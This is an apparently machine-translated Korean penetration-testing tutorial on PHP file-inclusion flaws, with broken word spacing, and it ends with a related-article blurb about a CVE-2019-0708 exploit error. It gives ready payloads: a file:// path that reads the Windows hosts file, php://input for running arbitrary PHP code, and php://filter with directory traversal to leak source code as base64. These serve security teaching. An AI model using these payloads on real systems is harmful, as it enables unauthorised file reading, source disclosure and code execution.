구멍 재현 편 - 파일 에 구멍 진급 포함 - HP 프로 토 콜 구멍
3955 단어 침투 테스트
지원 하 는 프로 토 콜 과 패키지 프로 토 콜
file:///
협의url 에 file 프로 토 콜 입력
file:///c:\\windows\\system32\\drivers\\etc\\hosts
hosts 파일 의 내용 이 성공 적 으로 표시 되 었 습 니 다

php://input
협의url 에 bp 패키지 로 입력php://input, 아래쪽 에 임의의 PHP 코드 를 쓸 수 있 습 니 다.


php://filter/read=convert.base64-encode/resource=index.php
협의url 에 php 프로 토 콜 입력
php://filter/read=convert.base64-encode/resource=../../index.php
index. php 의 내용 은 base 64 인 코딩 으로 표시


index.php
의 내용 을 볼 수 있 습 니 다 

이 내용에 흥미가 있습니까?
현재 기사가 여러분의 문제를 해결하지 못하는 경우 AI 엔진은 머신러닝 분석(스마트 모델이 방금 만들어져 부정확한 경우가 있을 수 있음)을 통해 가장 유사한 기사를 추천합니다:
cve-2019-0708 msf 실행 오류 해결cve-2019-0708 msf 실행 오류 해결 서버에 빈틈이 있는지 검사하는 과정에서 exploit의 오류가 발견되었고 오류 정보는 다음과 같다. 이미 뚜렷하다Exploit aborted due to failure...
텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
CC BY-SA 2.5, CC BY-SA 3.0 및 CC BY-SA 4.0에 따라 라이센스가 부여됩니다.